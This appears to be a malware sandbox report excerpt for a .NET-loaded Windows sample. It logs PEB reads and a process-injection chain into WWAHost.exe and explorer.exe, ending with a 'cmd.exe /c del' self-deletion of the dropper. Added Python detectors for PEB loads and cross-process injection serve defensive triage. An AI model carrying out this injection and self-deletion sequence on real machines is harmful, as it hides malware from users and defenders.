Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014809AD mov eax, dword ptr fs:[00000030h] 4_2_014809AD
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014809AD mov eax, dword ptr fs:[00000030h] 4_2_014809AD
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01492840 mov ecx, dword ptr fs:[00000030h] 4_2_01492840
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01484859 mov eax, dword ptr fs:[00000030h] 4_2_01484859
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01484859 mov eax, dword ptr fs:[00000030h] 4_2_01484859
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B0854 mov eax, dword ptr fs:[00000030h] 4_2_014B0854
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01516870 mov eax, dword ptr fs:[00000030h] 4_2_01516870
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01516870 mov eax, dword ptr fs:[00000030h] 4_2_01516870
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150E872 mov eax, dword ptr fs:[00000030h] 4_2_0150E872
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150E872 mov eax, dword ptr fs:[00000030h] 4_2_0150E872
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150C810 mov eax, dword ptr fs:[00000030h] 4_2_0150C810
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152483A mov eax, dword ptr fs:[00000030h] 4_2_0152483A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152483A mov eax, dword ptr fs:[00000030h] 4_2_0152483A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA830 mov eax, dword ptr fs:[00000030h] 4_2_014BA830
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A2835 mov eax, dword ptr fs:[00000030h] 4_2_014A2835
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A2835 mov eax, dword ptr fs:[00000030h] 4_2_014A2835
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A2835 mov eax, dword ptr fs:[00000030h] 4_2_014A2835
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A2835 mov ecx, dword ptr fs:[00000030h] 4_2_014A2835
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A2835 mov eax, dword ptr fs:[00000030h] 4_2_014A2835
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A2835 mov eax, dword ptr fs:[00000030h] 4_2_014A2835
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE8C0 mov eax, dword ptr fs:[00000030h] 4_2_014AE8C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015508C0 mov eax, dword ptr fs:[00000030h] 4_2_015508C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154A8E4 mov eax, dword ptr fs:[00000030h] 4_2_0154A8E4
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BC8F9 mov eax, dword ptr fs:[00000030h] 4_2_014BC8F9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BC8F9 mov eax, dword ptr fs:[00000030h] 4_2_014BC8F9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150C89D mov eax, dword ptr fs:[00000030h] 4_2_0150C89D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480887 mov eax, dword ptr fs:[00000030h] 4_2_01480887
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152EB50 mov eax, dword ptr fs:[00000030h] 4_2_0152EB50
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01552B57 mov eax, dword ptr fs:[00000030h] 4_2_01552B57
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01552B57 mov eax, dword ptr fs:[00000030h] 4_2_01552B57
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01552B57 mov eax, dword ptr fs:[00000030h] 4_2_01552B57
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01552B57 mov eax, dword ptr fs:[00000030h] 4_2_01552B57
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01528B42 mov eax, dword ptr fs:[00000030h] 4_2_01528B42
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01516B40 mov eax, dword ptr fs:[00000030h] 4_2_01516B40
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01516B40 mov eax, dword ptr fs:[00000030h] 4_2_01516B40
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154AB40 mov eax, dword ptr fs:[00000030h] 4_2_0154AB40
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01478B50 mov eax, dword ptr fs:[00000030h] 4_2_01478B50
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01534B4B mov eax, dword ptr fs:[00000030h] 4_2_01534B4B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01534B4B mov eax, dword ptr fs:[00000030h] 4_2_01534B4B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147CB7E mov eax, dword ptr fs:[00000030h] 4_2_0147CB7E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h] 4_2_014FEB1D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h] 4_2_014FEB1D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h] 4_2_014FEB1D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h] 4_2_014FEB1D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h] 4_2_014FEB1D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h] 4_2_014FEB1D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h] 4_2_014FEB1D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h] 4_2_014FEB1D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h] 4_2_014FEB1D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554B00 mov eax, dword ptr fs:[00000030h] 4_2_01554B00
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AEB20 mov eax, dword ptr fs:[00000030h] 4_2_014AEB20
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AEB20 mov eax, dword ptr fs:[00000030h] 4_2_014AEB20
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01548B28 mov eax, dword ptr fs:[00000030h] 4_2_01548B28
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01548B28 mov eax, dword ptr fs:[00000030h] 4_2_01548B28
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A0BCB mov eax, dword ptr fs:[00000030h] 4_2_014A0BCB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A0BCB mov eax, dword ptr fs:[00000030h] 4_2_014A0BCB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A0BCB mov eax, dword ptr fs:[00000030h] 4_2_014A0BCB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152EBD0 mov eax, dword ptr fs:[00000030h] 4_2_0152EBD0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480BCD mov eax, dword ptr fs:[00000030h] 4_2_01480BCD
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480BCD mov eax, dword ptr fs:[00000030h] 4_2_01480BCD
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480BCD mov eax, dword ptr fs:[00000030h] 4_2_01480BCD
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150CBF0 mov eax, dword ptr fs:[00000030h] 4_2_0150CBF0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AEBFC mov eax, dword ptr fs:[00000030h] 4_2_014AEBFC
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01488BF0 mov eax, dword ptr fs:[00000030h] 4_2_01488BF0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01488BF0 mov eax, dword ptr fs:[00000030h] 4_2_01488BF0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01488BF0 mov eax, dword ptr fs:[00000030h] 4_2_01488BF0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01534BB0 mov eax, dword ptr fs:[00000030h] 4_2_01534BB0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01534BB0 mov eax, dword ptr fs:[00000030h] 4_2_01534BB0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490BBE mov eax, dword ptr fs:[00000030h] 4_2_01490BBE
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490BBE mov eax, dword ptr fs:[00000030h] 4_2_01490BBE
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490A5B mov eax, dword ptr fs:[00000030h] 4_2_01490A5B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490A5B mov eax, dword ptr fs:[00000030h] 4_2_01490A5B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h] 4_2_01486A50
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h] 4_2_01486A50
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h] 4_2_01486A50
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h] 4_2_01486A50
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h] 4_2_01486A50
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h] 4_2_01486A50
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h] 4_2_01486A50
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BCA6F mov eax, dword ptr fs:[00000030h] 4_2_014BCA6F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BCA6F mov eax, dword ptr fs:[00000030h] 4_2_014BCA6F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BCA6F mov eax, dword ptr fs:[00000030h] 4_2_014BCA6F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152EA60 mov eax, dword ptr fs:[00000030h] 4_2_0152EA60
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FCA72 mov eax, dword ptr fs:[00000030h] 4_2_014FCA72
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FCA72 mov eax, dword ptr fs:[00000030h] 4_2_014FCA72
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150CA11 mov eax, dword ptr fs:[00000030h] 4_2_0150CA11
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AEA2E mov eax, dword ptr fs:[00000030h] 4_2_014AEA2E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BCA24 mov eax, dword ptr fs:[00000030h] 4_2_014BCA24
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BCA38 mov eax, dword ptr fs:[00000030h] 4_2_014BCA38
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A4A35 mov eax, dword ptr fs:[00000030h] 4_2_014A4A35
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A4A35 mov eax, dword ptr fs:[00000030h] 4_2_014A4A35
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014D6ACC mov eax, dword ptr fs:[00000030h] 4_2_014D6ACC
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014D6ACC mov eax, dword ptr fs:[00000030h] 4_2_014D6ACC
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014D6ACC mov eax, dword ptr fs:[00000030h] 4_2_014D6ACC
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480AD0 mov eax, dword ptr fs:[00000030h] 4_2_01480AD0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B4AD0 mov eax, dword ptr fs:[00000030h] 4_2_014B4AD0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B4AD0 mov eax, dword ptr fs:[00000030h] 4_2_014B4AD0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BAAEE mov eax, dword ptr fs:[00000030h] 4_2_014BAAEE
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BAAEE mov eax, dword ptr fs:[00000030h] 4_2_014BAAEE
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148EA80 mov eax, dword ptr fs:[00000030h] 4_2_0148EA80
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148EA80 mov eax, dword ptr fs:[00000030h] 4_2_0148EA80
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148EA80 mov eax, dword ptr fs:[00000030h] 4_2_0148EA80
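The `mov eax, dword ptr fs:[00000030h]` hits above are reads of the PEB pointer from the TEB. In a 32-bit (here WOW64) process this is the first step of walking PEB->Ldr to resolve exports by hand, which is how the unpacked payload locates APIs without an import table; the same pointer gives PEB->BeingDebugged. As an added triage check that is not part of this Joe Sandbox report or of the sample's own code: a Python byte scanner that locates the direct encodings of this load in a dumped code region. The code snippets it runs on are hand-assembled for the example, and it covers only the direct fs:[30h] / gs:[60h] forms, not a two-step TEB->PEB read, so it is a triage aid rather than a disassembler.

```python
"""Locate PEB pointer loads (fs:[0x30] on 32-bit, gs:[0x60] on 64-bit) in raw x86 code bytes."""
import re
from typing import List, Tuple

# Register order of the ModR/M reg field (values 0..7).
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
REG64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]

# 32-bit: 64 A1 30 00 00 00      -> mov eax, fs:[0x30]  (A1 = MOV EAX, moffs32)
#         64 8B /r 30 00 00 00   -> mov r32, fs:[0x30]  (ModR/M mod=00 rm=101 = disp32; reg field = r32)
PEB32 = re.compile(rb"\x64(?:\xA1|\x8B([\x05\x0D\x15\x1D\x25\x2D\x35\x3D]))\x30\x00\x00\x00")

# 64-bit: 65 48 8B /r 25 60 00 00 00 -> mov r64, gs:[0x60]  (REX.W; ModR/M rm=100 + SIB 0x25 = disp32, no base/index)
PEB64 = re.compile(rb"\x65\x48\x8B([\x04\x0C\x14\x1C\x24\x2C\x34\x3C])\x25\x60\x00\x00\x00")


def find_peb_loads(code: bytes) -> List[Tuple[int, str]]:
    """Return (offset, destination register) for every direct PEB pointer load found in `code`.

    This is a byte-pattern scan, not a disassembly: a match inside data is possible, and
    indirect forms (fs:[0x18] -> TEB, then TEB+0x30) are not covered.
    """
    hits: List[Tuple[int, str]] = []
    for m in PEB32.finditer(code):
        modrm = m.group(1)
        reg = "eax" if modrm is None else REG32[(modrm[0] >> 3) & 7]
        hits.append((m.start(), reg))
    for m in PEB64.finditer(code):
        hits.append((m.start(), REG64[(m.group(1)[0] >> 3) & 7]))
    return sorted(hits)


# Constructed 32-bit snippet for this example (hand-assembled, not bytes taken from the sample).
SAMPLE_CODE32 = bytes.fromhex(
    "55 8B EC "               # push ebp; mov ebp, esp
    "64 A1 30 00 00 00 "      # mov eax, fs:[0x30]        ; eax = PEB
    "8B 40 0C "               # mov eax, [eax+0x0C]       ; eax = PEB->Ldr
    "8B 40 14 "               # mov eax, [eax+0x14]       ; InMemoryOrderModuleList.Flink
    "64 8B 0D 30 00 00 00 "   # mov ecx, fs:[0x30]        ; ecx = PEB
    "8A 41 02 "               # mov al, [ecx+0x02]        ; PEB->BeingDebugged
    "64 8B 35 30 00 00 00 "   # mov esi, fs:[0x30]        ; esi = PEB
    "5D C3"                   # pop ebp; ret
)

# Constructed 64-bit snippet: mov rax, gs:[0x60]; ret
SAMPLE_CODE64 = bytes.fromhex("65 48 8B 04 25 60 00 00 00 C3")


if __name__ == "__main__":
    for off, reg in find_peb_loads(SAMPLE_CODE32):
        print(f"+0x{off:04x}: PEB pointer loaded into {reg}")
```

Run it over the unpacked region (the 3.2.yaM8XR1HfL.exe.170000.0.unpack dump listed further down) rather than the on-disk .NET binary: the fs:[30h] reads live in the native payload, not in the managed DarkTortilla loader.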
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0016E8B5 GetProcessHeap,HeapAlloc,GetProcessHeap, 9_2_0016E8B5
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0016D470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_0016D470
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\yaM8XR1HfL.exe NtQueueApcThread: Indirect: 0x18BA4F2
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe NtClose: Indirect: 0x18BA56C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory written: C:\Users\user\Desktop\yaM8XR1HfL.exe base: 170000 value starts with: 4D5A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory written: C:\Users\user\Desktop\yaM8XR1HfL.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: NULL target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: NULL target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Thread register set: target process: 1028
Source: C:\Windows\SysWOW64\WWAHost.exe Thread register set: target process: 1028
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 120000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe"
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe"
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\yaM8XR1HfL.exe"
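The lines above are the injection chain in order: the sample spawns a second instance of itself, unmaps the original image of WWAHost.exe at base 120000, maps an execute/read/write section into WWAHost.exe and explorer.exe, then redirects execution by setting a thread context (target process 1028) and queueing an APC into explorer.exe; WWAHost.exe finally deletes the dropper with cmd.exe /c del. As an added example, not part of this report or of any detection product: a Python detector that replays an API event stream and reports a (source, target) pair only when an executable payload reached a foreign process before its execution was hijacked. It keys on PIDs because the report names "Memory written" targets by image path, so a write into the spawned child of the same image and an in-process unpack look alike there. The events, PIDs and API names in the sample stream are constructed to mirror the chain, not taken from the sandbox trace.

```python
"""Flag cross-process PE injection (hollowing, or section mapping plus thread hijack/APC) in an API event stream."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple


@dataclass(frozen=True)
class ApiEvent:
    pid: int                          # process issuing the call
    api: str                          # native/Win32 API name
    target_pid: Optional[int] = None  # process the handle refers to, if any
    protection: str = ""              # page protection for section maps, e.g. "RWX"
    data_prefix: bytes = b""          # first bytes of a memory write


def stage_of(ev: ApiEvent) -> Optional[str]:
    """Map one event onto a stage of the injection chain, or None if it is not part of it."""
    if ev.api == "NtUnmapViewOfSection":
        return "unmap"
    if ev.api in ("NtWriteVirtualMemory", "WriteProcessMemory"):
        return "payload" if ev.data_prefix.startswith(b"MZ") else None  # a PE image was written
    if ev.api == "NtMapViewOfSection":
        return "payload" if "X" in ev.protection.upper() else None      # executable section mapped
    if ev.api in ("NtSetContextThread", "SetThreadContext", "NtQueueApcThread", "QueueUserAPC"):
        return "hijack"
    return None


def detect_injection(events: List[ApiEvent]) -> List[Tuple[int, int, str]]:
    """Return (source_pid, target_pid, technique) for each pair where an executable payload
    reached a foreign process and its execution was then redirected (context set or APC queued)."""
    seen: Dict[Tuple[int, int], Set[str]] = defaultdict(set)
    findings: List[Tuple[int, int, str]] = []
    for ev in events:
        # Only cross-process activity counts; in-process unpacking writes its own MZ header too.
        if ev.target_pid is None or ev.target_pid == ev.pid:
            continue
        stage = stage_of(ev)
        if stage is None:
            continue
        key = (ev.pid, ev.target_pid)
        if stage != "hijack":
            seen[key].add(stage)
            continue
        # Order matters: a hijack with no preceding payload is not reported.
        if "payload" in seen[key] and "reported" not in seen[key]:
            technique = "process hollowing" if "unmap" in seen[key] else f"remote PE injection via {ev.api}"
            findings.append((ev.pid, ev.target_pid, technique))
            seen[key].add("reported")
    return findings


# Constructed event stream modelled on the chain in the report; PIDs 100/200/300/400/500 are hypothetical.
SAMPLE_EVENTS = [
    ApiEvent(100, "NtCreateUserProcess", target_pid=200),                           # spawn suspended child
    ApiEvent(100, "NtUnmapViewOfSection", target_pid=200),                          # hollow its original image
    ApiEvent(100, "NtMapViewOfSection", target_pid=200, protection="RWX"),          # map payload section
    ApiEvent(100, "NtSetContextThread", target_pid=200),                            # redirect entry point
    ApiEvent(100, "NtMapViewOfSection", target_pid=300, protection="RWX"),          # second target
    ApiEvent(100, "NtQueueApcThread", target_pid=300),                              # run it via APC
    ApiEvent(100, "NtWriteVirtualMemory", target_pid=100, data_prefix=b"MZ\x90"),   # in-process unpack, ignored
    ApiEvent(400, "NtWriteVirtualMemory", target_pid=500, data_prefix=b"\x00\x01"), # non-PE write
    ApiEvent(400, "NtSetContextThread", target_pid=500),                            # hijack with no payload
]


if __name__ == "__main__":
    for src, dst, technique in detect_injection(SAMPLE_EVENTS):
        print(f"pid {src} -> pid {dst}: {technique}")
```

The two hijack APIs are kept together deliberately: NtSetContextThread on a suspended child and NtQueueApcThread into a running explorer.exe are different mechanisms, but from a telemetry point of view both are "foreign executable memory, then control transfer", and the report shows the sample using one per target.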
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2651644758.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094394902.0000000009B86000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000007.00000002.3294750047.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2497456423.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000002.3294750047.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2497456423.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.3299247758.0000000004B00000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.3294750047.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2497456423.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.3294750047.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2497456423.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000000.2496782788.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3292908189.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PProgman
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Queries volume information: C:\Users\user\Desktop\yaM8XR1HfL.exe VolumeInformation
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00158158 GetCurrentThreadId,GetCurrentThreadId,GetSystemTimeAsFileTime,GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentProcessId, 9_2_00158158
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_001A78E0 memset,memset,RtlGetVersion, 9_2_001A78E0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

